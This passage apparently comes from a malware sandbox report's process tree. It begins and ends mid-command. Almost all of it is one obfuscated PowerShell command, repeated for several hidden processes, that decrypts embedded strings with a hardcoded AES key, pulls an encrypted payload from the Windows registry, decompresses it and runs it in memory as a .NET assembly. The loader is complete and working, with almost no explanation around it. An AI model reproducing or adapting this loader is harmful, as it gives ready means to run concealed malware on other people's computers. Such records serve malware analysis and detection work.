[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:9096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:6648
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:3656
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:2840
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = 